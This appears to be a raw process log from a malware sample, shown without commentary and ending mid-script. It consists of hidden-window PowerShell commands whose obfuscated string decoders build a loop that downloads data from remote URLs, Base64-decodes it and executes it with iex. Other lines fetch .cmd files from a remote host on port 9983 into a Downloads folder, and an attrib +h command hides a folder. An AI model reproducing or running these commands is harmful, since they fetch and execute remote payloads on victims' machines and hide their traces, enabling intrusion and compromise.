powershell.exe -windowstyle hidden "$Decisorens='Sub';$Decisorens+='strin';$Pissoirets = 1;$Decisorens+='g';Function Ovibovinae($Gtteris){$brsflsomme=$Gtteris.Length-$Pissoirets;For($Ssttes89=5;$Ssttes89 -lt $brsflsomme;$Ssttes89+=6){$tored+=$Gtteris.$Decisorens.Invoke( $Ssttes89, $Pissoirets);}$tored;}function Siphoning($Moduler){ . ($Fratrdelsen) ($Moduler);}$topografs=Ovibovinae 'AmbulMSkunkoProvezUnb,niG,undlJimcrlPrrieaChoke/Rense5 Unde.Palp 0Ukonv Djede( R llWErhveiLrerinfluordK edio B,nswBloodsEri d ForbrN .tigT Clin Sand1Ekspa0Bandi.Presn0biogr;Indtg Tera,W VindiCheepn,eraa6 Dise4 pato;Masca RkenvxBende6,ymno4 nel;Brand Kolonr.onulv.eget:Reack1Alons2 lagl1Wen,h. eyed0Isklu) Efte Bere.Gf oebe LatecBa,isks,ndhoAmico/Sekst2 P ug0Go,er1Unhab0Ja id0godhj1Mando0l.bor1Repla SchweFJordliSp dsrYe peest,fff Esdro,eavexDispo/Cykel1.ngos2.belt1Diath.Stted0p,ece ';$Lettroenheds=Ovibovinae 'BrestUAfgnisGarroe Spr,rSyd,o-DiestAR.pargF.ldme Udd,nRivert Amir ';$Ciboney=Ovibovinae 'Fjerbh Hygrt MedltHyld p InvasSemid:Urano/Mel b/Prea.wCi,taw In,awSemin.Lith.sForlge sepanFremldSports Akkopb,spaaNyderc Pretedenia. YankcMastioEndosmSelen/StorhpBluntrChaulomo st/UdgradParcelUnvar/IntenhGopledBeetra Em.e6Afl,dmAfdelgEpaen ';$Transporterings7=Ovibovinae 'Ankri>resfo ';$Fratrdelsen=Ovibovinae 'Imprei KommeOilstxDomi, ';$Bivirknings='Unionizing';$septodiarrhea = Ovibovinae ' Socie St,tcHelheh TredoCathe Afsla%K.skvaReefypHensipLaserdBldkoaUntretJin la Mega% Unim\UnvioA,ecrinturaceH vedmCallgoDummetJas iavejf.x DidyiSenils Skif.D.ttoS Frgea,kravfWalin fanta&Henot&Overb AntiweS,attc Incrh ironoBramb nchatBrint ';Siphoning (Ovibovinae 'Ska,b$,laapgMin rl S.lfoVandfbUnipoaSljdll un r:RdninFFormaoOrigirRe,egeCardis MurktAccupa KidnaUo mreMagelnFortad AtheeRuddo=Redis(SammecVe.dem Fis dMarty Hogti/Ransac nmag ,irma$Ove.lsObjeceStirpp BegrtSphenoAfso dFortriSaarfa,lbumrtalr rN,nvohDermieAditsaUnsal)Kol.e ');Siphoning (Ovibovinae ' Unre$Baxiegl,ndslFras.o enfibDeltaaDilutlOrnit:Nonhyt ExamaTranssHydr kVetoweSongbn.triksFe.edpBegitiVanddlSk.lnlOvereeFaculrVskete emor=Polit$ ,ivsCFrikiiKl.rgbEffekoTapionDysm,eSolblySm tt.KarelsTetrapTeg.tlStathiVievatScape( Sang$ UnclTRemitrBeskya s linApatisUnadvp Fa roReblarIso,atPersoeMelderLin.iiInedunpoleagNe.rus pr.d7Forva)tr st ');$Ciboney=$taskenspillere[0];$Vornedskabs= (Ovibovinae 'Inter$SubjegKomprlF,rmio SambbBla.kaVig.ilbrinv:ForhaAIch ebSkaldoTrilom AfskaDelaysDesoruSta.isFilet=Ed,erNVersee YndewCross-DozerOStorkbDandajHourle TermcUmp.ntStrik PolyS Kdvayhightsprogrt T,bee Syntm Modt.Vrt,nNsubskeTalmut Armi.An geW P,ateOrmu.bH.adcCSh.velFacepidemiueFolkenFejlgt');$Vornedskabs+=$Forestaaende[1];Siphoning ($Vornedskabs);Siphoning (Ovibovinae '.ngan$BomulA DodgbInteroUnrecm.kovfaKontisCa hau MonisSkarn.MajdaH.aneleretolaTeknodFort,e Udr.r RittsReima[Senio$L,ladLGenskeUbehjtF otytLxxcorSnvleoFraade,ealin spash.orblehapted K.nesSule.]Sk.ed=Eri k$ Tr.et Ca,co azerpSulteo UnchgCarserEkphoaThybofKom,usgudhj ');$Rastedes=Ovibovinae ' ,tat$TabirA OplybTillgo VeksmB.gnia ustis SeptuNedslsBortf.SkinpDF rwao Aftaw.adionAera lN,lgnoThwaraMotocdGlaucF HostiDukkelHulake aner(Aarsr$,aimoCmaaleiBilbob PretoMotornShrineProtyyCompa, Rets$Et,peBkdgryeG,nnea Obdut Nonti U,rifSkippiBl msc,unnaaDescrl De.i) P,ec ';$Beatifical=$Forestaaende[0];Siphoning (Ovibovinae 'Nahum$ SiskgMu.til E gloF.ldkbMisanaTiltrlbohun:Po itkle.hal ,undaCr nipWelshp,lgaaeSkule=Kunde(TokobTHvileeStibisImplit Ynke-Sm ltPTelefa,nsvatNatdrhUdsto verbi$Res rBHun,eeDre.eaUnr,atYamskiStvb,fTermiiMisfacHitchaso tsl Un.o) Anti ');while (!$klappe) {Siphoning (Ovibovinae 'As,en$halshgGiobelMagmaoast,obAspidaUltralIndef: amilI He sn Pinel GidsaKransk Slu eAerob=Dec.m$H,ddottils rS,agsuMokkaeUns i ') ;Siphoning $Rastedes;Siphoning (Ovibovinae ' DaemSPlkimtkraniaUdsmyrUp,aktPitho-MankeSBundfl,remae DipleDisc.p Whit Dor.4Mejse ');Siphoning (Ovibovinae 'Yar e$,ikspgBugollCuamuo EmnebWurz atoaarll.veb: orskkSnydelNedkma SonipHellep skileRhabd= Unpr( Rap.TBaluse iessErnr,tFirea-InterPTransaMaveptSpecih Orig Erken$SuperB.tande.ltinaBetlet Ik di in.sfLutrii IllucMacroaKonfelTi,ul)Bra,t ') ;Siphoning (Ovibovinae 'Trans$ Ra,ggBekral DekroMinerb Sen,a,eduplRabb,:PohnaTCogitrAnd.saDragsk perstGeneraLikeltri,lebparmorT,rsku FotodAttendMonoceAfstit NordsDeca =A tor$ symmgOmo hlFangeoRundsbDoddyaDikotlellip:BoombTCerasyTendidBuffie ScrulOutjeiFan ag ennehGoddaeW xesd KontsAflur6Psyki0Att i+Tata,+grape%Drkl $ afvit Gudsa iurs KrigkSakkaeIndben N nms Forgp ,alei,vindl EpidlK afte uperAchroePorta. BlomcDagsmoStordu Svernhu,outConco ') ;$Ciboney=$taskenspillere[$Traktatbruddets];}$Besvangrings=327350;$Magnetizes=29673;Siphoning (Ovibovinae 'Himme$LeucogDist.l Vi ioMusm bS peraAnti.lIncon:Befu,F ,andoover,r klipmUregeeCannulNebuleTomatn,rder Tarms=Gangl ExxheGProgrealbyltHemme-egundC,roteoStor,nNonlotprogreRullenShm,otfrdse Agnus$JambkB Snige Ticta SkjotModuliEfterf DandiSke.tc Exena FlyvlForre ');Siphoning (Ovibovinae 'Gensk$ ogedgInappl f.looMorinbFiguragramml.hanc:AesthCSvirroElektn dkoms,nremtSga.er l moaAntiaiAf,enn AfteiFunktnSjakfgGawkylO.kldybonde Kinet=Chanc Photo[,onreS Semiy M,thsflamitPorceeYodelmMaske. eepyCOmstnoKamm.nSaxicv IsobePalmirstilltHydro]Ddssy:elekt:BeltwFResperSpil.o,edfim Wi,dB Vi raU opys SlakeSrgem6.oney4Com.lS GothtSadomrRajahiCantonOversgRegul(Be er$VbnerFDioxio.piscrimpasmT,llgeUn.erlSa.sgeVand nGirob)Allic ');Siphoning (Ovibovinae 'Unwar$ChampgNonhelBowleoE dosb R tea U.islInven:ApperAS,elluVedlgtSavleo Omdiv Ple.a Karts.entekTripteungesaGa ann iorglPe,sagRicingStense,erbotMitzy F.ys= .los Kandi[StumoSIngeryYndigsBeregtBiloceafi nmNonob. PensTUskyleEurokx Zaddtforbl.BosweE ewhnNoncoc PropoUnmasdGe,nei FisknRe,izg Outs]Presc:Skovb:RathaALandlS FratC AngeIMonodIFradr.SkoleGRemudeHy,hetYummiS Untht AsylrUna,iiUndernKak.fg frem( Unst$K,hytCTr,teoHelmenPli,tsFrerbtAtt,irChloraepephiFuturn Har iSceptnSuperg BrislSkrifyT lin)Tengu ');Siphoning (Ovibovinae 'Discu$HeavegChaldl.igtso Ove,bKonseaHovmolValed:UdbanBWild,o,ffenoMatarzEarspetruncrSa,nt=Tuber$ TeleAPa.dauyirtht mancoFoothvKingfaDri ks SeggkDreameRaadgaStempnAn ecl Kna.gObersg Tik eSognet ditt. AalesTorifuArboubPodagsFlanntNonidrA,achimis tnGalgagKludr(Nonne$baadeBSupraeb.sots.komavBrostaA.rennEnestg Duh r DistikogepnSpringLoatus Faru,Repo $TekstMMartha AmphgP ussntricaef,edst.alskiA,trkzSkattemelansAscog).iana ');Siphoning $Boozer;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Anemotaxis.Saf && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Dmoner='Sub';$Dmoner+='strin';$Hensigtsmssigt = 1;$Dmoner+='g';Function Gustatorially($Dybgangens){$lymphangiitis=$Dybgangens.Length-$Hensigtsmssigt;For($Parthbr=5;$Parthbr -lt $lymphangiitis;$Parthbr+=6){$Detailprojekter+=$Dybgangens.$Dmoner.Invoke( $Parthbr, $Hensigtsmssigt);}$Detailprojekter;}function Udtrringers192($Tenophony){ . ($Femdobbelte) ($Tenophony);}$Ulvemorens=Gustatorially 'D,gdrMAmusgoProtozFuseniRigsalCut.alStudbaMisau/Fugni5Model.s.opp0Ko,hi fl e(Pr fiWLskniiGlossnstanddVideooS.hemwMoca,s Gade MultiNN terTRechr Pu,kt1Unde,0 alsl.Ar,br0Opmaa;oplys OkinaWSt,amiPl,inn A,er6Ku,ha4Skjal;Skild RadicxUnive6Sgeor4Whit.;Scale R,llyrRiddev.blat:Estop1 Teks2Is.ga1Tarti. Bh.g0Hier.)Hoved SiderGalliaeTima cGrusvkPreseoUncov/S,sse2 Rege0Ivana1Kolon0Iowah0 Flyv1Svag 0No.au1Gamme Sp llFM,ffiiSouthrGu abeAly.sfAppero Cam,xDamna/Fyrin1 ousi2Whela1Bogkl.bomhu0udma ';$Folktale=Gustatorially 'FlskeU ArissAkkoretweetr Smul- PresASemipgFyr,ne Overnp nsptGenn ';$brnesder=Gustatorially 'HovmehCi.ert.isretPar,spFemh.s Unsu:Salut/Konfi/canonwphlogwCephawGu.hi.ClerksUltimeRhabdnIagt.dCakews VivipSemiaaVerdoc Intee elie.Samfuc ,nydo Indsm,crew/ Ulcep ErysrAspenoInjur/mlposd HydrlFort,/Assastsolo.rSpi l8KrydscGangw2A eksxFlota ';$Lnudvikling134=Gustatorially ' ovti>S mmo ';$Femdobbelte=Gustatorially 'PurkeiVoksdeUnperxLno.e ';$Forholdende='Legemsbygnings';$Cycledom = Gustatorially ' brode Xeroc TaenhHo,ieoVlskb Semiu%Pap ca U enp BhutpInvigdSporoaUdfrstAnti.aGeck.%.heop\Yog,tEFra.otDrifthParaleZan,ar Tak,ivtafssBelg.eLnninrForgasNon.x.Uk ndOPorcepStraasKuns Bagag&Grund&Sacri T.inkeSu,ercUnde hVaabeoHj,ed .ulnitsvige ';Udtrringers192 (Gustatorially 'Palae$FldebgVendelSpecioH licbDi.piaAfgudl Trav:TuberJS raduSarcovH wseeApiphnflasheHiccusElatccSubseeTysten StrutElytr=S ksi(D.pencGirthmArci dAfkli Hyeto/Stru.c.ekrt Ru e$PhotoC.fslayDat.ccmyelilSonede endodTormeoTillemGring)Moder ');Udtrringers192 (Gustatorially '.aras$Ma,drgMagislLovteo,aperbStrafa Lu.tlmatal:KlderPEkstrastandrTingsiLukratattemeIns,stSkrifeUncanr rintnPolyseKobl,=Pleu,$d,ababElec,rAktion edeleMahogsT.uttdForfje Ne.trEskap. nvens Icyfp BirdlMentai Unint Fibe(bruce$Fnys,LGoavenSal.suOthe dVolumv Styri KonfkRe islJizyai .ulgn Ove,gAn im1Se.io3Anuri4An.im)Fritn ');$brnesder=$Pariteterne[0];$Spndingsfelts203= (Gustatorially 'Stru.$Spiltg Clo.lUndero BodabRerouaMisvilfor u:Kn,psOMessiu,iscotRe,rowAnlg r SkrmeHi tosPotbot ElevlSta,eeP esh2 ustr3Semim3 Mela=Or,itNBlodse Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Python"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Helvetica='Sub';$Helvetica+='strin';$Finn81 = 1;$Helvetica+='g';Function Enkeltvis($Fuldstndigheden){$Outgrin=$Fuldstndigheden.Length-$Finn81;For($Hegnstraad=5;$Hegnstraad -lt $Outgrin;$Hegnstraad+=6){$Merkonomernes+=$Fuldstndigheden.$Helvetica.Invoke( $Hegnstraad, $Finn81);}$Merkonomernes;}function Surfeiting($Retsinstituts){ .($Mindevrdig105) ($Retsinstituts);}$Unadduced=Enkeltvis ' .ateMbekrioMitzvzSelekiLnmodlKongel .assa,igar/Spher5 Inhe.Tigge0 ishe Tal,u(Sou hWN nsuiSu.stnresyndcatacoUptilwTarmks Dame Ind,aN FremTAvia, P ula1.enai0aliza.S aer0R,vio; blin AppeaWFor.uimil,snSty,o6Appul4Trimp;Len,m Proc.x inau6 Over4Nyans;Creod KinemrAnurivTreef: Rig.1Poeti2 Epiz1Woman.Scolo0 D ga) ,til B.rseG kilseRadiacTorvekVaernoFiske/Bldgr2Fe.lb0U,spo1 Brkr0,ateg0Oprrs1 Fler0Eno,a1 Klar De,iaFLophoiPlurarsneezeNedstfPolypoSeriex Domk/ nsul1 Afvn2Eamon1Bese..Homo,0coc,a ';$Naturtalent=Enkeltvis 'WilliU T,knsKje eeResenrOverd-Stat.A Sc ugSo omeUropanBaandtO ers ';$Blokbeskyttelsen=Enkeltvis 'F,annhBrepitElliptPrerepSupersAlien:Frabe/ ispe/Rili.wLam,awDucklwSwann.CoendsPantoe Fi,sn FlakdPalmes pacep,lodtaKernicDesceeZithe.Tvangc P.otoSpinemModes/Un elpgnotorTermooMaudl/ Umbed tasl.enpe/Water0Lingeu BladoArtisjka.itxUnjub0B.pre ';$Faggy=Enkeltvis ' enne>Brems ';$Mindevrdig105=Enkeltvis 'S.mafiAmmo,eInterxmefis ';$Imparsonee='Fugio';$stedsbiords = Enkeltvis 'AfridePla,tcDyndshSubsto nneu Op at%F rbrasyltepPlanop ForpdidoloaNektotNyligaLgdom%Fleur\VurdeCEshjboIsta,rDay odAperiifri,ea temu.TatovGUdvika S inrLmmel ro h&Defro&Limit Pre.eOmladcCreodhWi raoBandb FnokstMasse ';Surfeiting (Enkeltvis 'Foreg$GrippgRedellNigg o DesebPeroxa SniglNonde: ikriRlimmoeFun.mlXanthiUdk leWild vTittie Pones Indv2Yea,l2Noege4 Subm=repro(Fo.ebcCon,umbrutad ioxi Invad/IndhacIndre L.bsk$Ddel,sKoshetLabioeModstd AlpesNonrebFrdigiPlaneo Ovulr X,rad.amles Unfo) Tarm ');Surfeiting (Enkeltvis 'Count$Pegm,gdistrlFugt,oAnalob S.araAsseml Myo : AnalFFadseeThrashDishoa 